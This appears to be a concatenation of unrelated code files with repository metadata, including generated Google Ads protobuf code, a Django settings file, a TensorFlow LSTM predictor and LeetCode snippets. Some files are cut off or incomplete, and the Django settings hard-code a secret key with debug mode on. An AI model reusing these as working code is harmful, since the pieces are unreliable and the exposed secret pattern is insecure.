\x01(\x0b\x32\x30.google.ads.googleads.v5.common.YouTubeVideoInfoB\x03\xe0\x41\x05H\x00\x12R\n\x0fyoutube_channel\x18\t \x01(\x0b\x32\x32.google.ads.googleads.v5.common.YouTubeChannelInfoB\x03\xe0\x41\x05H\x00:\x85\x01\xea\x41\x81\x01\n2googleads.googleapis.com/CustomerNegativeCriterion\x12Kcustomers/{customer}/customerNegativeCriteria/{customer_negative_criterion}B\x0b\n\tcriterionB\x05\n\x03_idB\x8b\x02\n%com.google.ads.googleads.v5.resourcesB\x1e\x43ustomerNegativeCriterionProtoP\x01ZJgoogle.golang.org/genproto/googleapis/ads/googleads/v5/resources;resources\xa2\x02\x03GAA\xaa\x02!Google.Ads.GoogleAds.V5.Resources\xca\x02!Google\\Ads\\GoogleAds\\V5\\Resources\xea\x02%Google::Ads::GoogleAds::V5::Resourcesb\x06proto3'
,
dependencies=[google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2.DESCRIPTOR,google_dot_ads_dot_googleads__v5_dot_proto_dot_enums_dot_criterion__type__pb2.DESCRIPTOR,google_dot_api_dot_field__behavior__pb2.DESCRIPTOR,google_dot_api_dot_resource__pb2.DESCRIPTOR,google_dot_api_dot_annotations__pb2.DESCRIPTOR,])
_CUSTOMERNEGATIVECRITERION = _descriptor.Descriptor(
name='CustomerNegativeCriterion',
full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion',
filename=None,
file=DESCRIPTOR,
containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[
_descriptor.FieldDescriptor(
name='resource_name', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.resource_name', index=0,
number=1, type=9, cpp_type=9, label=1,
has_default_value=False, default_value=b"".decode('utf-8'),
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005\372A4\n2googleads.googleapis.com/CustomerNegativeCriterion', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='id', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.id', index=1,
number=10, type=3, cpp_type=2, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='type', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.type', index=2,
number=3, type=14, cpp_type=8, label=1,
has_default_value=False, default_value=0,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\003', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='content_label', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.content_label', index=3,
number=4, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_application', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.mobile_application', index=4,
number=5, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='mobile_app_category', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.mobile_app_category', index=5,
number=6, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='placement', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.placement', index=6,
number=7, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_video', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.youtube_video', index=7,
number=8, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
_descriptor.FieldDescriptor(
name='youtube_channel', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.youtube_channel', index=8,
number=9, type=11, cpp_type=10, label=1,
has_default_value=False, default_value=None,
message_type=None, enum_type=None, containing_type=None,
is_extension=False, extension_scope=None,
serialized_options=b'\340A\005', file=DESCRIPTOR, create_key=_descriptor._internal_create_key),
],
extensions=[
],
nested_types=[],
enum_types=[
],
serialized_options=b'\352A\201\001\n2googleads.googleapis.com/CustomerNegativeCriterion\022Kcustomers/{customer}/customerNegativeCriteria/{customer_negative_criterion}',
is_extendable=False,
syntax='proto3',
extension_ranges=[],
oneofs=[
_descriptor.OneofDescriptor(
name='criterion', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion.criterion',
index=0, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
_descriptor.OneofDescriptor(
name='_id', full_name='google.ads.googleads.v5.resources.CustomerNegativeCriterion._id',
index=1, containing_type=None,
create_key=_descriptor._internal_create_key,
fields=[]),
],
serialized_start=314,
serialized_end=1183,
)
_CUSTOMERNEGATIVECRITERION.fields_by_name['type'].enum_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_enums_dot_criterion__type__pb2._CRITERIONTYPEENUM_CRITERIONTYPE
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._CONTENTLABELINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._MOBILEAPPLICATIONINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._MOBILEAPPCATEGORYINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._PLACEMENTINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._YOUTUBEVIDEOINFO
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel'].message_type = google_dot_ads_dot_googleads__v5_dot_proto_dot_common_dot_criteria__pb2._YOUTUBECHANNELINFO
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['criterion']
_CUSTOMERNEGATIVECRITERION.oneofs_by_name['_id'].fields.append(
_CUSTOMERNEGATIVECRITERION.fields_by_name['id'])
_CUSTOMERNEGATIVECRITERION.fields_by_name['id'].containing_oneof = _CUSTOMERNEGATIVECRITERION.oneofs_by_name['_id']
DESCRIPTOR.message_types_by_name['CustomerNegativeCriterion'] = _CUSTOMERNEGATIVECRITERION
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
CustomerNegativeCriterion = _reflection.GeneratedProtocolMessageType('CustomerNegativeCriterion', (_message.Message,), {
'DESCRIPTOR' : _CUSTOMERNEGATIVECRITERION,
'__module__' : 'google.ads.googleads_v5.proto.resources.customer_negative_criterion_pb2'
,
'__doc__': """A negative criterion for exclusions at the customer level.
Attributes:
resource_name:
Immutable. The resource name of the customer negative
criterion. Customer negative criterion resource names have the
form: ``customers/{customer_id}/customerNegativeCriteria/{cri
terion_id}``
id:
Output only. The ID of the criterion.
type:
Output only. The type of the criterion.
criterion:
The customer negative criterion. Exactly one must be set.
content_label:
Immutable. ContentLabel.
mobile_application:
Immutable. MobileApplication.
mobile_app_category:
Immutable. MobileAppCategory.
placement:
Immutable. Placement.
youtube_video:
Immutable. YouTube Video.
youtube_channel:
Immutable. YouTube Channel.
""",
# @@protoc_insertion_point(class_scope:google.ads.googleads.v5.resources.CustomerNegativeCriterion)
})
_sym_db.RegisterMessage(CustomerNegativeCriterion)
DESCRIPTOR._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['resource_name']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['id']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['type']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['content_label']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_application']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['mobile_app_category']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['placement']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_video']._options = None
_CUSTOMERNEGATIVECRITERION.fields_by_name['youtube_channel']._options = None
_CUSTOMERNEGATIVECRITERION._options = None
# @@protoc_insertion_point(module_scope)
| [
"noreply@github.com"
] | noreply@github.com |
98585d037823bca9246c3776455ace23f0a0afed | 0f52b2074afa3f1a99942ad5473da3786bf4f4cf | /distributed_systems/lab1/example/send.py | 9118cd99af10b6d6cc1b8640152c6da821282a30 | [] | no_license | pokachopotun/msu_m118_ivanov | 350a5f9000565a1b3739b6ffcd4ec7c68150cf78 | 2a58e006c174f59b94e2b4582943ebf3adc4a9bd | refs/heads/master | 2022-12-12T22:44:13.440398 | 2020-09-04T10:08:07 | 2020-09-04T10:08:07 | 149,507,569 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 326 | py | import pika
if __name__ == "__main__":
connection = pika.BlockingConnection(pika.ConnectionParameters('localhost'))
channel = connection.channel()
channel.queue_declare(queue='hello')
channel.basic_publish(exchange='', routing_key='hello', body='hello_world')
print("message sent")
connection.close()
| [
"mr.salixnew@gmail.com"
] | mr.salixnew@gmail.com |
dfca92b9a02a0b34ddb02223c46fc05f0ac34303 | e35fd52fe4367320024a26f2ee357755b5d5f4bd | /leetcode/problems/434.number-of-segments-in-a-string.py | 229c119643f381afef999ff54714d595c048b7dc | [] | no_license | liseyko/CtCI | a451967b0a0ce108c491d30b81e88d20ad84d2cd | c27f19fac14b4acef8c631ad5569e1a5c29e9e1f | refs/heads/master | 2020-03-21T14:28:47.621481 | 2019-11-12T22:59:07 | 2019-11-12T22:59:07 | 138,658,372 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 642 | py | #
# @lc app=leetcode id=434 lang=python3
#
# [434] Number of Segments in a String
#
# https://leetcode.com/problems/number-of-segments-in-a-string/description/
#
# algorithms
# Easy (37.34%)
# Total Accepted: 64.1K
# Total Submissions: 171.8K
# Testcase Example: '"Hello, my name is John"'
#
# Count the number of segments in a string, where a segment is defined to be a
# contiguous sequence of non-space characters.
#
# Please note that the string does not contain any non-printable characters.
#
# Example:
#
# Input: "Hello, my name is John"
# Output: 5
#
#
#
class Solution:
def countSegments(self, s: str) -> int:
| [
"liseyko@gmail.com"
] | liseyko@gmail.com |
d6acdc7be6d3ca9573b4e644b7cbbb548f5f5d26 | 90aabfcae85240357345ef6def635fc0fa2e990f | /scripts/ComputeFRAC.py | e3f1f4157133266dd8e19bc8b0465dc7011dc5f1 | [] | no_license | kingsfordgroup/sailfish-paper | d612d7be62b25bcc4ec8d74da42fb6a4861869da | b53d2477d6b1312596b72cb3f6ed89d224891f80 | refs/heads/master | 2021-01-19T07:35:32.894403 | 2013-12-13T06:12:31 | 2013-12-13T06:12:31 | 15,155,029 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,188 | py | import sys
import argparse
def main(args):
# The input is assumed to be 3 columns and of the form:
# name length expression
# the last column should be convertable to a float.
exps = None
try:
exps = [ (l.split()[0], float(l.split()[1]), float(l.split()[2])) for l in args.infile]
except ValueError:
print "Could not convert entry in column 2 or 3 to a float"
# The total expression is just the sum of all expressions
tot = sum([e[2] for e in exps])
norm = 1.0 / tot
outfile = args.outfile
# Write the resulting expressed fractions to the output file
for e in exps:
l = float(e[1])
rc = float(e[2])
frac = rc * norm
outfile.write("{}\t{}\t{}\n".format(e[0], l, frac))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Normalize last column of input file to sum to 1")
parser.add_argument('infile', nargs='?', type=argparse.FileType('r'),\
default=sys.stdin)
parser.add_argument('outfile', nargs='?', type=argparse.FileType('w'),\
default=sys.stdout)
args = parser.parse_args()
main(args)
| [
"rob.patro@gmail.com"
] | rob.patro@gmail.com |
981d2629bcdcab88cf240a91cd7b473f19cf401f | 3d8ac3725161b351f98003faa50e6290ef821f0a | /bte_project/btre/settings.py | 27e44b451edf051a27514d84c9bdf551288262ed | [] | no_license | jiachengli1999/learn_django | 5f49506e240766bbe2a05e17edceb3c64990ddac | 893192f577964586eed0fa5ed0442372c5714d88 | refs/heads/master | 2020-06-07T09:07:48.453407 | 2019-01-10T18:22:14 | 2019-01-10T18:22:14 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,924 | py | from django.contrib.messages import constants as messages
"""
Django settings for btre project.
Generated by 'django-admin startproject' using Django 2.1.3.
For more information on this file, see
https://docs.djangoproject.com/en/2.1/topics/settings/
For the full list of settings and their values, see
https://docs.djangoproject.com/en/2.1/ref/settings/
"""
import os
# Build paths inside the project like this: os.path.join(BASE_DIR, ...)
BASE_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))
# Quick-start development settings - unsuitable for production
# See https://docs.djangoproject.com/en/2.1/howto/deployment/checklist/
# SECURITY WARNING: keep the secret key used in production secret!
SECRET_KEY = 'kv@!$v140x((x2(@!&3jwbni!d29(415_g3&i+r!in3f9q0o(6'
# SECURITY WARNING: don't run with debug turned on in production!
DEBUG = True
ALLOWED_HOSTS = []
# Application definition
# when creating a new app you need to run python manga.py startapp -appname-
# then add the application to settings
INSTALLED_APPS = [
'pages.apps.PagesConfig',
'listings.apps.ListingsConfig',
'realtors.apps.RealtorsConfig',
'accounts.apps.AccountsConfig',
'contacts.apps.ContactsConfig',
'django.contrib.admin',
'django.contrib.auth',
'django.contrib.contenttypes',
'django.contrib.sessions',
'django.contrib.messages',
'django.contrib.staticfiles',
'django.contrib.humanize'
]
MIDDLEWARE = [
'django.middleware.security.SecurityMiddleware',
'django.contrib.sessions.middleware.SessionMiddleware',
'django.middleware.common.CommonMiddleware',
'django.middleware.csrf.CsrfViewMiddleware',
'django.contrib.auth.middleware.AuthenticationMiddleware',
'django.contrib.messages.middleware.MessageMiddleware',
'django.middleware.clickjacking.XFrameOptionsMiddleware',
]
ROOT_URLCONF = 'btre.urls'
TEMPLATES = [
{
'BACKEND': 'django.template.backends.django.DjangoTemplates',
'DIRS': [os.path.join(BASE_DIR, 'templates')],
'APP_DIRS': True,
'OPTIONS': {
'context_processors': [
'django.template.context_processors.debug',
'django.template.context_processors.request',
'django.contrib.auth.context_processors.auth',
'django.contrib.messages.context_processors.messages',
],
},
},
]
WSGI_APPLICATION = 'btre.wsgi.application'
# Database
# https://docs.djangoproject.com/en/2.1/ref/settings/#databases
DATABASES = {
'default': {
'ENGINE': 'django.db.backends.postgresql',
'NAME': 'btre',
'USER': 'postgres',
'HOST': 'localhost'
}
}
# Password validation
# https://docs.djangoproject.com/en/2.1/ref/settings/#auth-password-validators
AUTH_PASSWORD_VALIDATORS = [
{
'NAME': 'django.contrib.auth.password_validation.UserAttributeSimilarityValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.MinimumLengthValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.CommonPasswordValidator',
},
{
'NAME': 'django.contrib.auth.password_validation.NumericPasswordValidator',
},
]
# Internationalization
# https://docs.djangoproject.com/en/2.1/topics/i18n/
LANGUAGE_CODE = 'en-us'
TIME_ZONE = 'UTC'
USE_I18N = True
USE_L10N = True
USE_TZ = True
# Static files (CSS, JavaScript, Images)
# https://docs.djangoproject.com/en/2.1/howto/static-files/
STATIC_ROOT = os.path.join(BASE_DIR, 'static')
STATIC_URL = '/static/'
STATICFILES_DIRS = [
os.path.join(BASE_DIR, 'btre/static')
]
# Media folder settings
MEDIA_ROOT = os.path.join(BASE_DIR, 'media')
MEDIA_URL = '/media/'
# messages
MESSAGE_TAGS = {
messages.INFO: 'danger'
}
# email config
# EMAIL_HOST = 'smpt.gmail.com'
# EMAIL_PORT = 587
# EMAIL_HOST_USER =
# EMAIL_HOST_PASSWORD =
# EMAIL_USE_TLS = True
| [
"ozalkhan196@gmail.com"
] | ozalkhan196@gmail.com |
3220349f7f91d774a0ba432392d7d9c9850ff482 | 6cb1b63846e818255945cdf1e8faf4f3e353c735 | /venv/datafountain/guangfudianzhan/rnn_model.py | 87c3ca177a47ced431bdc18c4103bd73cbabe8f0 | [] | no_license | LuckyHandsomeCat/deep_learning | 3eb2bec1133f8e547436a8625b40e8bfa8bc7572 | 8c37912069a06a58f80034fe1be7ba5fbc0865d4 | refs/heads/master | 2020-08-08T02:50:10.278517 | 2018-11-30T11:11:34 | 2018-11-30T11:11:34 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,208 | py | #!/usr/bin/env python3
# -*-coding:utf8 -*-
# @TIME :2018/6/21 下午1:27
# @Author :hwwu
# @File :PricePredictor.py
import codecs
import matplotlib.pyplot as plt
import numpy as np
import tensorflow as tf
import pandas as pd
class PricePredictor:
# lstm param
timeStep = 19
hiddenUnitSize = 38 # 隐藏层神经元数量
batchSize = 88 # 每一批次训练多少个样例
inputSize = 19 # 输入维度
outputSize = 1 # 输出维度
lr = 0.0001 # 学习率
train_x, train_y = [], [] # 训练数据集
dataFile = '/Users/liyangyang/Downloads/datafountain/guangdianfute/public.train.csv'
testFile = '/Users/liyangyang/Downloads/datafountain/guangdianfute/public.test.csv'
train_data = []
X = tf.placeholder(tf.float32, [None, timeStep, inputSize])
Y = tf.placeholder(tf.float32, [None, timeStep])
# Y = tf.placeholder(tf.float32, [None, timeStep, outputSize])
weights = {
'in': tf.Variable(tf.random_normal([inputSize, hiddenUnitSize])),
'out': tf.Variable(tf.random_normal([hiddenUnitSize, 1]))
}
biases = {
'in': tf.Variable(tf.constant(0.1, shape=[hiddenUnitSize, ])),
'out': tf.Variable(tf.constant(0.1, shape=[1, ]))
}
savePath = '/Users/liyangyang/PycharmProjects/mypy/venv/datafountain/guangfudianzhan/model/stock.train.model'
def loadData(self):
data = pd.read_csv(self.dataFile)
data = np.array(data)
train_len = len(data)
train = []
for i in range(train_len):
if ((round(data[i][1], 2) != 0.01) | (round(data[i][2], 1) != 0.1)):
if (data[i][2] < -1000):
print(data[i][2])
data[i][2] = -6.0
if (data[i][19] > 360):
data[i][19] -= 360
if (data[i][20] < 0):
data[i][20] = -data[i][20]
train.append(data[i])
print(len(train))
self.train_data = np.array(train)
# 构造数据
def buildTrainDataSet(self):
x_ = self.train_data[:, 1:20]
y_ = self.train_data[:, 20]
for i in range(len(self.train_data) - self.timeStep - 1):
x = x_[i:i + self.timeStep]
y = y_[i:i + self.timeStep]
self.train_x.append(x.tolist())
self.train_y.append(y.tolist())
# lstm算法定义
def lstm(self, batchSize=None):
if batchSize is None:
batchSize = self.batchSize
weightIn = self.weights['in']
biasesIn = self.biases['in']
input = tf.reshape(self.X, [-1, self.inputSize])
inputRnn = tf.matmul(input, weightIn) + biasesIn
inputRnn = tf.reshape(inputRnn, [-1, self.timeStep, self.hiddenUnitSize]) # 将tensor转成3维,作为lstm cell的输入
# cell=tf.nn.rnn_cell.BasicLSTMCell(self.hiddenUnitSize, reuse=True)
# initState=cell.zero_state(batchSize,dtype=tf.float32)
# output_rnn,final_states=tf.nn.dynamic_rnn(cell, inputRnn,initial_state=initState, dtype=tf.float32) #output_rnn是记录lstm每个输出节点的结果,final_states是最后一个cell的结果
# **步骤2:定义一层 LSTM_cell,只需要说明 hidden_size, 它会自动匹配输入的 X 的维度
lstm_cell = tf.nn.rnn_cell.BasicLSTMCell(num_units=self.hiddenUnitSize, forget_bias=1.0, state_is_tuple=True)
# **步骤3:添加 dropout layer, 一般只设置 output_keep_prob
# 运行test的时候注释掉这段,不能dropout
lstm_cell = tf.nn.rnn_cell.DropoutWrapper(cell=lstm_cell, input_keep_prob=1.0, output_keep_prob=0.5)
# **步骤4:调用 MultiRNNCell 来实现多层 LSTM
mlstm_cell = tf.nn.rnn_cell.MultiRNNCell([lstm_cell] * 5, state_is_tuple=True)
# **步骤5:用全零来初始化state
init_state = mlstm_cell.zero_state(batchSize, dtype=tf.float32)
output_rnn, final_states = tf.nn.dynamic_rnn(mlstm_cell, inputRnn, initial_state=init_state,
dtype=tf.float32) # output_rnn是记录lstm每个输出节点的结果,final_states是最后一个cell的结果
output = tf.reshape(output_rnn, [-1, self.hiddenUnitSize]) # 作为输出层的输入
w_out = self.weights['out']
b_out = self.biases['out']
pred = tf.matmul(output, w_out) + b_out
return pred, final_states
# 训练模型
def trainLstm(self):
pred, _ = self.lstm()
# 定义损失函数
loss = tf.sqrt(tf.reduce_mean(tf.square(tf.reshape(pred, [-1]) - tf.reshape(self.Y, [-1]))))
# 定义训练模型
train_op = tf.train.AdamOptimizer(self.lr).minimize(loss)
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
# sess.run(tf.global_variables_initializer())
saver.restore(sess,self.savePath)
# 重复训练100次,训练是一个耗时的过程
for i in range(1000):
step = 0
start = 0
end = start + self.batchSize
while end < len(self.train_x):
_, loss_ = sess.run([train_op, loss], feed_dict={self.X: self.train_x[start:end],
self.Y: self.train_y[start:end]})
# start += 1
start += self.batchSize
end = start + self.batchSize
# 每10步保存一次参数
if step % 500 == 0:
print('test loss is :', i, loss_)
if (i % 10 == 0) & (step % 500 == 0):
print("保存模型")
saver.save(sess, self.savePath)
step += 1
def prediction(self):
pred, _ = self.lstm() # 预测时只输入[1,time_step,inputSize]的测试数据
saver = tf.train.Saver(tf.global_variables())
with tf.Session() as sess:
# 参数恢复
saver.restore(sess, self.savePath)
# 取训练集最后一行为测试样本. shape=[1,time_step,inputSize]
result = []
start = 20
end = start + self.batchSize
# while end < len(self.train_x):
pred = sess.run([pred], feed_dict={self.X: self.train_x[start:end]
})
# 以折线图表示结果
p = np.reshape(pred, [self.batchSize, -1])
s = 0
b = self.timeStep
x = [i for i in range(s, b*19)]
# 以折线图表示结果
plt.figure()
plt.plot(x, p[0], color='r', label='yuce')
plt.plot(x, self.train_y[s:b], color='y', label='shiji')
plt.xlabel("Time(s)") # X轴标签
plt.ylabel("Value") # Y轴标签
plt.show()
predictor = PricePredictor()
predictor.loadData()
# 构建训练数据
predictor.buildTrainDataSet()
# # 模型训练
predictor.trainLstm()
#
# # 预测-预测前需要先完成模型训练
# predictor.prediction()
| [
"wuhongwei@videopls.com"
] | wuhongwei@videopls.com |
d14d8e86f2e15d90eda2d0d0d8abdf5f9dbfa243 | 4c0c9fff693c9af77277347e680cd29881f712e2 | /person_group_delete.py | a144b2abb8cce9614393246c9c6a5a77d8bc7eb8 | [
"MIT"
] | permissive | akash0905/Microsoft_Cognative_service_Face_API | 59bd73e19647d7075ccf32f642bdfe83fd999aac | 24671ffeff1b175372020468ae60dc73908f8582 | refs/heads/master | 2022-12-26T20:52:48.070930 | 2020-10-01T05:55:21 | 2020-10-01T05:55:21 | 300,162,202 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 681 | py | # -*- coding: utf-8 -*-
"""
Created on Mon Dec 30 21:21:10 2019
@author: AKASH DIXIT
"""
import http.client, urllib.request, urllib.parse, urllib.error
subscription_key = 'xxxxxxxxxxxxxxxxxxxxxxxxx'
headers = {
# Request headers
'Ocp-Apim-Subscription-Key':subscription_key
}
params = urllib.parse.urlencode({
})
try:
conn = http.client.HTTPSConnection('centralindia.api.cognitive.microsoft.com')
conn.request("DELETE", "/face/v1.0/persongroups/mangal1?%s" % params, "{body}", headers)
response = conn.getresponse()
data = response.read()
print(data)
conn.close()
except Exception as e:
print("[Errno {0}] {1}".format(e.errno, e.strerror)) | [
"noreply@github.com"
] | noreply@github.com |
3dcb6a3fba7b2c2c8998314caf270f7dc4b3d69c | 824f19d20cdfa26c607db1ff3cdc91f69509e590 | /TopInterviewQuestions/LinkedList/01-Delete-Node.py | e8cc4b8ff1bfc6f65dfa58aa9f76058738818e2a | [] | no_license | almamuncsit/LeetCode | 01d7e32300eebf92ab54c983de6e183242b3c985 | 17aa340649574c37067ec170ceea8d9326be2d6a | refs/heads/master | 2021-07-07T09:48:18.069020 | 2021-03-28T11:26:47 | 2021-03-28T11:26:47 | 230,956,634 | 4 | 0 | null | null | null | null | UTF-8 | Python | false | false | 346 | py | # Definition for singly-linked list.
# class ListNode:
# def __init__(self, x):
# self.val = x
# self.next = None
class Solution:
def deleteNode(self, node):
while node.next.next:
node.val = node.next.val
node = node.next
node.val = node.next.val
node.next = None
| [
"msarkar.cse@gmail.com"
] | msarkar.cse@gmail.com |
9390ec85b5042809b379ae4dd1ec5c0551bc8d16 | 00f41859a0deb3e96a7f89c65f904f9c29ff787f | /custom_storages.py | 8f3721c358182b42d75ad40c0d2c27e376fae1fa | [] | no_license | DelroyBrown28/FryedProject | 5d226e7c5cc13a4f90f56c3a57f7ad6c3ae8eadc | 12cb438bcb560499eb43976ec8f4d44759af824a | refs/heads/main | 2023-01-13T10:58:26.396033 | 2020-10-30T20:07:52 | 2020-10-30T20:07:52 | 308,069,663 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 253 | py | from django.conf import settings
from storages.backends.s3boto3 import S3Boto3Storage
class StaticStorage(S3Boto3Storage):
location = settings.STATICFILES_LOCATION
class MediaStorage(S3Boto3Storage):
location = settings.MEDIAFILES_LOCATION
| [
"Delroy_jb@hotmail.co.uk"
] | Delroy_jb@hotmail.co.uk |
60c586549370e3fbb1ebd8bbe3f0cd9caba71e15 | 3f29503e6d776ef0914217b1c922f4bc78af4fdd | /13.HASH MAP/1338_Reduce Array Size to The Half_MED/solution.py | 8a43eec458a5c93f42b5aa20c4251801a04035a9 | [] | no_license | kimmyoo/python_leetcode | cd4ff3c4f6d190840bbf5fb9acdca2b92554a6fa | 813235789ce422a3bab198317aafc46fbc61625e | refs/heads/master | 2023-08-16T07:36:38.688871 | 2023-08-15T22:38:00 | 2023-08-15T22:38:00 | 132,544,297 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 498 | py | class Solution(object):
def minSetSize(self, arr):
"""
:type arr: List[int]
:rtype: int
"""
half = len(arr)/2
d = collections.Counter(arr)
c = d.values()
c.sort(reverse=True)
if max(c) >= half:
return 1
begin, end = 0, 1
sum = max(c)
while True:
sum += c[end]
if sum >= half:
return end+1-begin
else:
end+=1
| [
"kimmyoo@gmail.com"
] | kimmyoo@gmail.com |
58164113ee9263b740a498ee50b571ca868e923c | 1d14e9d0aac0c9a439808c4f765fe1f39bb2c07a | /towhee/tests/mock_operators/cv2_decoder/cv2_decoder.py | 03599b052376c4a28851d8e1e898fa006d72da36 | [
"Apache-2.0"
] | permissive | NbnbZero/towhee | 35b17b0075ea830114224548e151c5c1c39b8e80 | 37e5c82bb139cb056a038ebc9f5723a8adcc954e | refs/heads/main | 2023-08-29T15:20:36.188522 | 2021-10-27T07:34:28 | 2021-10-27T07:34:28 | 385,546,940 | 1 | 0 | Apache-2.0 | 2021-07-13T09:21:15 | 2021-07-13T09:21:15 | null | UTF-8 | Python | false | false | 1,375 | py | # Copyright 2021 Zilliz. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from typing import NamedTuple, List
import cv2
from PIL import Image
from towhee.operator import Operator, SharedType
